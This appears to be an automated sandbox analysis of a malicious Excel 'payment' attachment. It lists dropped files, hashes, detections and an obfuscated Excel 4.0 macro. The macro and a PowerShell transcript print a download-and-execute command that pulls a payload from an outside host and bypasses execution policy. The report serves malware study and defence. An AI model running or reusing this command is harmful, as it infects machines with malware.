Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-08T08:39:54">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 33555
Entropy (8bit): 5.02521092294607
Encrypted: false
SSDEEP: 768:qzV3IpNBQkj2Lh4iUxtaHard3/Fn6/zFtFgVx1UtRj7vioBnPVe7oZtU9OdB5tAd:qzV3CNBQkj2Lh4iUx+qdP56/zFzgVx15
MD5: 1EE9CD5AFE273BCB1273CD14AAD12A24
SHA1: FFB214AEB1C1A1B635AAD1BD60F370C24F5AE99F
SHA-256: 2A43414EC0CAC2908FFE7F42607C18ED01AEEBEB1F39AE971ED8A29F9ACC77BC
SHA-512: DB88734EF7070AA26D9EB5E3A1F526E9A2D49B93A99EA89C5C47BF3003E16B5BBDA7397ABC8093D3F33D42573DD80FCDD60654C6619F5FCE4E90213746DEE6D5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: PSMODULECACHE.#....a.)...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........o.8...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet...........'...C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):19692
                                                                                                                                                      Entropy (8bit):5.612455869249591
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:ytksZVBwVq3piwlz/7iSBKngulBILC779TISJQpay6mp+4sY4:/qYwlrG4KgulBIUIRGw4
                                                                                                                                                      MD5:51DDE5249B286B52EF9229912AD98618
                                                                                                                                                      SHA1:3D916E4BB19F01F03DFB921438B1156101360FF6
                                                                                                                                                      SHA-256:E6561BE6AF9EB609C38DDDA1C826753D8CF4114B2A6368AC9630AC7E7D9AD4BC
                                                                                                                                                      SHA-512:778353F136AD386FC14D8A78138CAF28E482891B7954B31B96710596834A54722A512BF226AD9749CE205D64F4095FBF50902043348E18A98E77C45BDFCE81DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1AA10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):115669
                                                                                                                                                      Entropy (8bit):7.925918362600709
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:xGjHzSJtwYold/FMeHxvPnelLDCfXoCFOhT:8DIwYoLH9PnedDCfLAhT
                                                                                                                                                      MD5:980EDB1D4E3A2AA7CC8E148A7ADD557C
                                                                                                                                                      SHA1:F1B82D663987C46715DEEACD8313E8BC6376A7DE
                                                                                                                                                      SHA-256:4708FF793B68858E5A580A5BC704A2E58D6FB6906F2A48A272AB361BC18FFB45
                                                                                                                                                      SHA-512:B46B6502C4B370110236EA1C5FDDFD22CE502869157596D39A8E958EB6ED0D6736F1E392E2025679EA4B1AC0164272036479F4A2EE144751D44159F95E2493E8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RESBD2F.tmp
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2188
                                                                                                                                                      Entropy (8bit):2.7180858502310796
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pg0BC93hHIWhKoXffI+ycuZhNUvfakSHvYPNnq92pGzW9I:K0BC9RoMKgH1ul0a3Yq9h
                                                                                                                                                      MD5:1A21F29FE75C935E4D9DAB3AF862AD14
                                                                                                                                                      SHA1:1E7E91823764C94F4BA9BB133C6AC97A05B4F712
                                                                                                                                                      SHA-256:8C44258ECD4FCA0C5F85C753462B86167D32AB68670ABAD8A907D80200442160
                                                                                                                                                      SHA-512:0622D2017B70B82514213E65CB6D23C6224412FE7A202AB5AE76DAB1D9B06BE0BB2984332259FF7BCBEE417C614123AE8F1DAEEA40BC0F2DDB34E8DCBD1E4F74
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP..................q.k.>.................4.......C:\Users\user\AppData\Local\Temp\RESBD2F.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Documents.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test1.txt
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1691648
                                                                                                                                                      Entropy (8bit):7.901599109868755
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:OGs56nQsgC/2Bo5dcW/McLiyKQJpDEGKHh0jXJ:mEOIdcYfLiyKQzD9c0jZ
                                                                                                                                                      MD5:977BE4BFD3F8EBD3F7EF56DCE06046CA
                                                                                                                                                      SHA1:D79746B09430C99F01729AE6C447D54EA9434546
                                                                                                                                                      SHA-256:0ACBF142760FA262369C7DB70A8284D2320496D461D468011D5316E00A725382
                                                                                                                                                      SHA-512:029357805FB41267326313D3BC5C2770505C215261992A8B06211E5093CC89F4DED3ADD470D443273874AF5BF0E49DDFF5B86365A9504A308FA7A432E8DD8794
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                      Reputation:low
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test2.gif
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:PNG image data, 843 x 685, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):52573
                                                                                                                                                      Entropy (8bit):7.929770193106239
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:q8as4TUSrbfoAKgxCllllllhy8PZMPAW07jI:ETUkJkllllllhyKnI
                                                                                                                                                      MD5:BD077FF603FB6873277C658C2FA9F84B
                                                                                                                                                      SHA1:2F70973669FEABE962DA03DD4F4A25CE789EF7A1
                                                                                                                                                      SHA-256:12CE388F55373DBAA49259D196B2B692EF70A2CD1999406BB46D562AA9C56168
                                                                                                                                                      SHA-512:205C3E7CB055179F24CBA13BC381A358648221A37F1F05EFFBDE91814794941FFDCFB3D41567B3E86970683180570D4CE18CE4A49EA729202A989200A91737B7
                                                                                                                                                      Malicious:false
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1744221
                                                                                                                                                      Entropy (8bit):7.905244958740085
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:OGs56nQsgC/2Bo5dcW/McLiyKQJpDEGKHh0jXJG/I:mEOIdcYfLiyKQzD9c0jZG/I
                                                                                                                                                      MD5:19387B30D6DBE83E31D3CAC884280D93
                                                                                                                                                      SHA1:6B3E69CA8EB1FAB3562069DDD536E17E9FDEB065
                                                                                                                                                      SHA-256:24376FC5EB6DF0EF9DC45BF80BE3B7C5FC05451C8838A237FB755C3DDDDF6A58
                                                                                                                                                      SHA-512:92E592CE199AECBF15FCF99834BC3A9B8DCC06C74F62B8364F7E4C303C3945619CACF8C9D66F0BD229ABAAB5FCF462852FA9FCF21C6679D4EF66A1373FD774B3
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjero14r.dsc.psm1
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 1
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqwk4ohh.b1d.ps1
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 1
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):652
                                                                                                                                                      Entropy (8bit):3.1049088739218784
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryiNMUfak7YnqqHNMUYPN5Dlq5J:+RI+ycuZhNUvfakSHvYPNnqX
                                                                                                                                                      MD5:DB7FD971D76BFC3E0B0782EF9BCFDCFD
                                                                                                                                                      SHA1:8E321D7EA427122870ADE8F110A6273E241385A6
                                                                                                                                                      SHA-256:6433DE3B63669C4BE0D0CE9C5FB3513117E632E299CAA254A1EA172E680408B3
                                                                                                                                                      SHA-512:44E202D3C7AD43A0A5B65D12985A46DC85490E395D054322654D79DD511DAF2DDEB71D066A76B39F517B56808D3E5018145E7124DEA2944C1D98E99CC62E3D73
                                                                                                                                                      Malicious:false
Preview: binary VS_VERSION_INFO resource (StringFileInfo: FileVersion 0.0.0.0, InternalName nwaha3c5.dll, OriginalFilename nwaha3c5.dll, ProductVersion 0.0.0.0, Assembly Version 0.0.0.0)
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.0.cs
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:C++ source, UTF-8 Unicode (with BOM) text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):227
                                                                                                                                                      Entropy (8bit):4.717324531992703
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:V/DsYLDS81zumJFR66rMUSRkoSdt+imlwy:V/DTLDfuCRlrMf9Amlwy
                                                                                                                                                      MD5:45B27450C87DFD52C3202A5D753ACE9D
                                                                                                                                                      SHA1:A1994630E847E7105A17D99B84C0775AD5FF3082
                                                                                                                                                      SHA-256:1D49AB035313FBF58CF764BB0C20D9A3F891AFA4D6F2493092CE39A1864A70D3
                                                                                                                                                      SHA-512:A67DD616D149E95F9303633919B47ABEE3CE091C18266C2C2B7F8CE07615BF7EABE7AB4AD60A6E24FE63E68B7EECC31F5E0CA79F7DE7DB09E38685F0999DC89F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace nATIve.{. public class Win. {. [ DllImport ( ("use" + "r32" + ".dll" ) ) ] public static extern bool ShowWindow(int handle , int state) ; .. }..}.
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):369
                                                                                                                                                      Entropy (8bit):5.242580375842531
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fd/bKzxs7+AEszIWXp+N23fd/bv:p37Lvkmb6KHcWZE85
                                                                                                                                                      MD5:0E8245CB95F40B647C9CD4210D638CCE
                                                                                                                                                      SHA1:B8E9046F358FE425A421493E157A33F5E7B250D2
                                                                                                                                                      SHA-256:5456C47D4AAF84D1D487D016271DD8100BF193D529854B59209919B482FBF9B1
                                                                                                                                                      SHA-512:C7396FCA61E8E163FED6598AEB634E44573FC93BBC2E5241407A6BA1084727EE73E385AE6468BE812AB464D57830F17D5E3A89DA87A4C0F2CEB349209BE48B7C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.0.cs"
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3072
                                                                                                                                                      Entropy (8bit):2.709829994885581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:etGSI/Bepsl/d8d7itoztltkZfIZ1QoHUxbI+ycuZhNUvfakSHvYPNnq:63yuMtoxQJIlHKb1ul0a3Yq
                                                                                                                                                      MD5:EE1AC02E0555F66ACE02D9BC41202DEE
                                                                                                                                                      SHA1:90EABB4D7D17554E10F963804E362A1D5F810F8D
                                                                                                                                                      SHA-256:70942BF7DE993FFEF8AA3A32323C7CF3055BB7D7ADAC7C4436D55887EDDC10E4
                                                                                                                                                      SHA-512:B3BAABDB9A3F6A79C50352CCA26461BDFE59B094EAA6EFE5B4417C2B95D2E0E5FA34809A4FA6882543861C7AE6E3678F8C552D262D7D34A41432A6A90EE6C79B
                                                                                                                                                      Malicious:false
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text/.rsrc/.reloc, CLR metadata (BSJB, v4.0.30319) with strings: <Module>, nwaha3c5.dll, Win, nATIve, mscorlib, System.Object, ShowWindow, .ctor, handle, state, System.Runtime.CompilerServices
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.out
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):412
                                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jan 8 16:39:56 2021, atime=Fri Jan 8 16:39:56 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.668183062655162
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8YmiW4CXUAuElPCH2YgZFYC0nl+WrjAZ/2bDyLC5Lu4t2Y+xIBjKZm:8Ye4jgZ2zAZiDb87aB6m
                                                                                                                                                      MD5:05930875E1214990952104359F32266D
                                                                                                                                                      SHA1:EA0127B857448AF602FB50D19A704A93D7B7AF63
                                                                                                                                                      SHA-256:AD16089895ED495200F5E013CA60829DC3BF85D43B8051A7F714EF5EFA56EC65
                                                                                                                                                      SHA-512:DDDD3B0DF60B509F790A986D54F66F936EE3A9C49CFA7AF16707370F7AA701525835B9898F32FCB49F8FA5EE682991B14A818D1F3F5FA6659A3FD12FFC9F6A03
                                                                                                                                                      Malicious:false
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Scanned_25526662-Payment.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Fri Jan 8 16:39:56 2021, atime=Fri Jan 8 16:39:56 2021, length=130560, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2250
                                                                                                                                                      Entropy (8bit):4.701797705276847
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8mRh/vcdwEZxM9B6pmRh/vcdwEZxM9B6:82/U7ZxM9K2/U7ZxM9
                                                                                                                                                      MD5:07DAAB2C3AB4CA9099FF8F299D5E2CB7
                                                                                                                                                      SHA1:73B959E6E946E6D76240D6B543BEF59D1DC0C59B
                                                                                                                                                      SHA-256:F6F4E4481CC5E08BD9FBF738CA716467B01C4BC253EAFD467E7AA52F04469566
                                                                                                                                                      SHA-512:9BDADA3277A9ED00C5A23E779E038BECDE490554EE443D7DD9BD10CCADED750B5252BCAF0C818C73581A1556B53C04F0FE93B15D9363F44186DCC8D0CA12F725
                                                                                                                                                      Malicious:true
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):180
                                                                                                                                                      Entropy (8bit):4.777475947375911
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:zQtfUDEY5iyBVomMQtfUDEYuNfUDEYmMQtfUDEYv:zQtfUgiiyj6QtfUgffUgKQtfUgC
                                                                                                                                                      MD5:454B08023C04D3D51E0919A5D30DA746
                                                                                                                                                      SHA1:3336E8A93B0E884C45B296387403119179914226
                                                                                                                                                      SHA-256:DE4EB7D21A212470F415C1FB45320ABABA55E34DFB9F07688A4A02A60AE83127
                                                                                                                                                      SHA-512:396A1DF4508194B3CBDE3D17EB9FD87B15F41540C6CE7B234920959F9F87374205ADA300E1F29C17020891AE1547916FAACBD7C05115216FD5A06DA192991B6E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [xls]..Scanned_25526662-Payment.xls.LNK=0..Desktop.LNK=0..[xls]..Scanned_25526662-Payment.xls.LNK=0..Scanned_25526662-Payment.xls.LNK=0..[xls]..Scanned_25526662-Payment.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\1BA10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):138781
                                                                                                                                                      Entropy (8bit):7.488943905849951
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:b4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAkHwSJtUkUlR/FoeHxv7nalHDCfZoCFg:ExEtjPOtioVjDGUU1qfDlavx+W2QnA8V
                                                                                                                                                      MD5:F469584A496D5D74D979C15062D580AC
                                                                                                                                                      SHA1:F6403FB404A3FDD9EA3E0367D3727DA89F9A25FE
                                                                                                                                                      SHA-256:2E2ABE8548C697A7BBDDDFF2BB418B525697CA389CB7CBA7778923933CD2B11C
                                                                                                                                                      SHA-512:AF28B72F53DB255C5D151D7727310591F0ADAF3047A8AB3BB87803762BF9BEB6ED8143DA520B56E8EC22F9C5F085F297E15A7AA39E08FBE68D16B3702AEDEDB3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\Desktop\1BA10000, Author: Florian Roth

C:\Users\user\Documents\20210108\PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1281
Entropy (8bit): 5.311363078079541
Encrypted: false
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210108094013..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))..Process ID: 6940..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210108094013..**********************..PS>IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))..False..C:\Users\user\AppData\Local\Temp\Test1.txt..C:\Users\user\AppData\Local\Temp\Test2.gif.. 1 file(s) copied...Executing (Win32_Process)->Create()..Method execution successful...Out Parameters:..instance of __PARA

\Device\ConDrv
Process: C:\Windows\SysWOW64\wbem\WMIC.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 160
Entropy (8bit): 5.095703110114614
Encrypted: false
Malicious: false
Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4928;...ReturnValue = 0;..};....

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: OBA, Last Saved By: OBA, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 6 16:47:21 2021, Last Saved Time/Date: Wed Jan 6 16:49:04 2021, Security: 0
Entropy (8bit): 7.633929977062203
TrID:
• Microsoft Excel sheet (30009/1) 45.83%
• Microsoft Works Spreadsheet (27457/6) 41.94%
• Generic OLE2 / Multistream Compound File (8008/1) 12.23%
File name: Scanned_25526662-Payment.xls
File size: 123904

File Icon

Icon Hash: 74ecd4c6c3c6c4d8

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "Scanned_25526662-Payment.xls"

Indicators

Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1252
Author: OBA
Last Saved By: OBA
Create Time: 2021-01-06 16:47:21
Last Saved Time: 2021-01-06 16:49:04
Creating Application: Microsoft Excel
Security: 0

Document Summary

Document Code Page: 1252
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 786432

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114
General
Stream Path: \x1CompObj
File Type: data
Stream Size: 114
Entropy: 4.25248375193
Base64 Encoded: True

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 288
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 288
Entropy: 3.22237115402
Base64 Encoded: False

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 200
Entropy: 3.42401113166
Base64 Encoded: False

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 119481
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 119481
Entropy: 7.73465408824
Base64 Encoded: True

Macro 4.0 Code

=SDs95LPpzopuDcZDU8hUBnJdjpz3DTM & xvpj1SYG7ygbfNzTQgb1pl & h4m6iHDrpuC8foIZBCpyw51u0YeZhrROFu8QefOhN & n0uXY119a7UTzjVjbzaSc & jeRiWEh13A2xyNeQioR3x & TXdUbbRAIaBGmbaYT & WGkwsmF2sb7S7H9AgMcj3ZTC56Xjh1T6 & mHxeebWDqG799FwPoNJfDQzOVRnYM8LXOG4R2nO3Gpi & LNomLC1O & iEi0eXp8sAGCLXevNQ7 & ppWJ1V7MBOumusr6mgFOCISN0FhM9mji & h7SaY8nqb57oK4XDdUUaFgoVIKa & IbtiRrV0IbO3HYPjYeSwMAvYq5CErl3N & zKVi3cfeEtCEeHLkwmNalEynPuAM & PyLprObWf2kwfAb2zu2QEk0XSRIWGspOyGY & ZJO5o4Ziyq & Lr6av3LLfdRIdHyxVZgTvZ & UWH8HACiUjgg & RrHvX68ZqcUCJnDrw5ryT7khTnvgMvL6nm3b4ZCKtSr3Yw3k & mMuy3ChhR4AjwIWFtkiqMkrVu6 & ldGDtSSMb8Lla&EXEC((((((((((("cmd.eXE  /c PoWErsHEll  -ex ByPASs -nop -w 1 IeX( cUrl  ('http://lankarecipes.com/Sparc.jp'  + 'g' ))")))))))))))
=RETURN()

Network Behavior

Network Port Distribution

TCP Packets

